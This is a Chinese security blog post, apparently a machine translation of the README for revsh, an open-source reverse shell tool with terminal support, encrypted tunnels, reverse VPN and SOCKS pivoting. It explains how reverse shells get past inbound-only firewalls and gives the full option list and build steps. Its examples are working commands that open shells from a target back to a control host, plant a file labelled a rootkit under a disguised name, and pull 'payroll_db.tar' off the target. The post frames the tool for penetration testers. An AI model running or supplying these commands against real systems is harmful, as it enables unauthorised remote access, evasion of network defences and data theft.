标注的博客| 安全研究| 渗透测试| APT

首页

emptymonkey/revsh:一个具有终端支持、数据隧道和高级旋转功能的反向shell。

作者 prehn 时间 2020-03-17
all

revsh是一个工具,用于建立具有终端支持的反向shell、用于高级旋转的反向vpn以及任意数据隧道。

新闻

概述

什么是“反壳”?

反向shell是授予远程主机shell访问权限的网络连接。与telnet和ssh等其他远程登录工具不同,远程主机启动了一个反向shell。这种从远程网络连接出站的技术允许绕过配置为仅阻止入站连接的防火墙。

什么是“反向VPN”?

revsh能够将虚拟以太网卡(tun/tap)连接到其加密通道的两端。然后,这些卡可用于转发原始IP数据包或以太网帧。当与Iptables NAT规则结合,或者桥接一个真正的以太网卡时,这允许操作员在目标机器网络上接收一个完全可路由的IP地址。本质上,这是一个完整的VPN,它执行了对运营商的回接呼叫,以绕过绑定包过滤并授予运营商完全的网络访问权限。(有关详细信息,请参阅“Documentation/REVERSE_VPN.md”。)

什么是“绑定外壳”?

绑定shell是从正常的正向网络连接提供服务的shell。revsh支持反向和绑定外壳。要调用绑定外壳程序,可以调用连接两端的-b标志,也可以将二进制文件调用为“bindsh”。

我就不能用网猫吗?

建立反向shell有很多技术,但这些方法不提供终端支持。revsh允许反向shell,其连接由伪终端介导,因此允许以下特性:

此外,revsh还提供以下功能:

revsh是pentester工具包的一个补充工具,它提供了一个加密隧道的完整终端功能集。

在哪里可以使用revsh?

revsh是在x86_64Linux上开发的。下面是已在其上使用的Arch/OS组合的简要列表:

(如果您在另一个平台上成功地使用了revsh,请给我一行代码,我会将其添加到列表中。)

用法

[email protected]:~$ revsh -h Control: revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]] Target: revsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]] ADDRESS The address of the control listener. (Default is "0.0.0.0".) PORT The port of the control listener. (Default is "2200".) CONTROL_OPTIONS: -c Run in "command and control" mode. (Default is target mode.) -a Enable Anonymous Diffie-Hellman mode. (Default is Ephemeral Diffie-Hellman.) -d KEYS_DIR Reference the keys in an alternate directory. (Default is "~/.revsh/keys/".) -f RC_FILE Reference an alternate rc file. (Default is "~/.revsh/rc".) -s SHELL Invoke SHELL as the remote shell. (Default is "/bin/bash".) -F LOG_FILE Log general use and errors to LOG_FILE. (No default set.) TARGET_OPTIONS: -t SEC Set the connection timeout to SEC seconds. (Default is "3600".) -r SEC1,SEC2 Set the retry time to be SEC1 seconds, or (Default is "600,1200".) to be random in the range from SEC1 to SEC2. MUTUAL_OPTIONS: -k Run in keep-alive mode. Node will neither exit normally, nor timeout. -L [LHOST:]LPORT:RHOST:RPORT Static socket forwarding with a local listener at LHOST:LPORT forwarding to RHOST:RPORT. -R [RHOST:]RPORT:LHOST:LPORT Static socket forwarding with a remote listener at RHOST:RPORT forwarding to LHOST:LPORT. -D [LHOST:]LPORT Dynamic socket forwarding with a local listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.) -B [RHOST:]RPORT Dynamic socket forwarding with a remote listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.) -x Disable automatic setup of proxies. (Defaults: Proxy D2280 and tun/tap devices.) -b Start in bind shell mode. (Default is reverse shell mode.) The -b flag must be invoked on both ends. -n Non-interactive netcat style data broker. (Default is interactive w/remote tty.) No tty. Useful for copying files. -v Verbose. -vv and -vvv increase verbosity. -V Print the program and protocol versions. -h Print this help. -e Print out some usage examples.

安装

首先,您需要从源代码构建OpenSSL。(见下面的注释。)

git clone https://github.com/openssl/openssl.git cd openssl/ ./config no-shared -static # These options are needed to build static applications against OpenSSL. make && make test # We skip "make install" so we don't conflict with your systems default OpenSSL. We will build _revsh_ against the OpenSSL we just compiled in this tree. cd ..

现在建立revsh。

git clone https://github.com/emptymonkey/revsh.git cd revsh vi config.h # Set up new defaults that fit your situation. vi Makefile # Check that the selected build environment is the one you want. (It probably already is by default.) make # This *can* take a very long time, though it usually doesn't. make install vi ~/.revsh/rc # Add your favorite startup commands to really customize the feel of your remote shell. revsh -h

注意:随着OpenSSL 1.1.0的发布,需要从源代码构建OpenSSL,以便在静态链接的二进制文件中使用。针对大多数Linux发行版(包括Kali)附带的OpenSSL库构建静态链接的二进制文件是行不通的。(如果它完全建立起来,它就会分离。)

实例

控制主机示例IP:192.168.0.42目标主机示例IP:192.168.0.66

Interactive example on default port '2200': control: revsh -c target: revsh 192.168.0.42 Interactive example on non-standard port '443': control: revsh -c 192.168.0.42:443 target: revsh 192.168.0.42:443 Bindshell example: target: revsh -b control: revsh -c -b 192.168.0.66 Non-interactive file upload example: control: cat ~/bin/rootkit | revsh -c -n target: revsh 192.168.0.42 > ./totally_not_a_rootkit Non-interactive file download example: control: revsh -c -n >payroll_db.tar target: cat payroll_db.tar | revsh 192.168.0.42 Non-interactive file download example across existing tunnel: control: revsh -c -n 127.0.0.1:2291 >payroll_db.tar target: cat payroll_db.tar | revsh 127.0.0.1:2290